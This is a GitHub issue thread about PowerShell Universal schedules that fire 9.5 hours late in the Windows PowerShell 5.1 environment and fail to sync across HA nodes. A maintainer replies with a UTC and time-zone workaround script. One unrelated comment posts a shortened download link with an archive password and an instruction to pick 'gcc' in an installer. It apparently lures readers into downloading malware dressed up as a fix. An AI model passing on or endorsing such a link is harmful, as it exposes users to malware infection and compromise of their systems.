### ISSUE TITLE
scheduling handles time zones different between "integrated" and "PS 5.1" environment

### ISSUE THREAD

**Issue by RubenT91** [ironmansoftware/powershell-universal#3661]
### Version

4.3.2

### Severity

High

### Environment

msi

### Steps to Reproduce

Set up a PSU environment with two nodes in an HA configuration behind an F5 Load Balancer.
Use the API endpoint to create a one-time schedule via a script executed in the Windows PowerShell 5.1 environment.
The script receives a JSON payload with a time string in local format ("MM/dd/yyyy hh
tt") and uses the New-PSUSchedule command to create the schedule:

$scheduleStr = (Get-Date $action.runat -format "yyyy-MM-ddTHH:mm:ss"), "+09:30" -join ' '
$action.runat = 'now'

$sparam = @{
    payload = $( $action | ConvertTo-Json -Compress)
}

$schedule = New-PSUSchedule -OneTime $scheduleStr -Script "AlloyScripts\AlloyAction.ps1" -Parameters $sparam -name "$($action.ticket) - $UAJobId" -Environment "Windows PowerShell 5.1" -UseDefaultCredentials

Observe that the schedule is created on only one node and not synchronized across the HA cluster.
Attempt to execute the job; note that the schedule shows the correct time in the UI but is actually scheduled 9.5 hours late when executed in the Windows PowerShell 5.1 environment.

### Expected behavior

```console
The one-time schedule should be created with the correct local time and should be synchronized across all nodes in the HA cluster.
The schedule should execute at the specified time, regardless of the environment (Integrated or Windows PowerShell 5.1).
Schedules created via API or script should be visible and executable on all nodes in the HA cluster.
```

### Actual behavior

```console
The schedule is created only on the node that executed the script and is not synchronized across the HA cluster.
When executed in the Windows PowerShell 5.1 environment, the schedule shows the correct time in the UI but executes 9.5 hours late.
Schedules created via API or script are not visible on the other HA node, and if the node that created the schedule is down, the job does not execute.
```

### Additional Environment data

PSU Version: 4.3.2
PowerShell Version: Windows PowerShell 5.1
Operating System: Windows Server (exact version to be specified)
Dashboard Framework: N/A
HA Configuration: Two-node cluster behind F5 Load Balancer
Git Sync Configured: Yes

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by adamdriscoll** [comment]
@RubenT91 -

I don't see anything wrong with the scheduler, but I would recommend the customer adjust their script. When I run their script as is, there is certainly a discrepancy between the displayed time and the scheduled time in the scheduler process. 

To work around this, they should convert their DateTime object to UTC and then specify the Time Zone directly on New-PSUSchedule. When I do this, I see that the displayed time in the admin console matches the scheduled time in the scheduler. 

```
$runat = '8/30/2024 13:00'
$scheduleStr = (Get-Date $runat -format "yyyy-MM-ddTHH:mm:ss"), "+09:30" -join ' '
[DateTime]$DT = $scheduleStr
$DT = $DT.ToUniversalTime()
New-PSUSchedule -Name 'OneTime' -OneTime $DT -Script "Script.ps1" -TimeZone 'Australia/Darwin'
```

They can verify that the scheduled time is correct by navigating to the hangfire page (http://localhost:5000/hangfire), clicking Jobs and then clicking Scheduled. It will display the scheduled job and includes the time stamp. It should match what is in the admin console. 

As far as the load balanced nodes not displaying the same one-time schedules, that is just a display issue. The scheduler is shared in HA setups via SQL and one of the two nodes will pick it up and run it .

I'll open a separate issue for that.
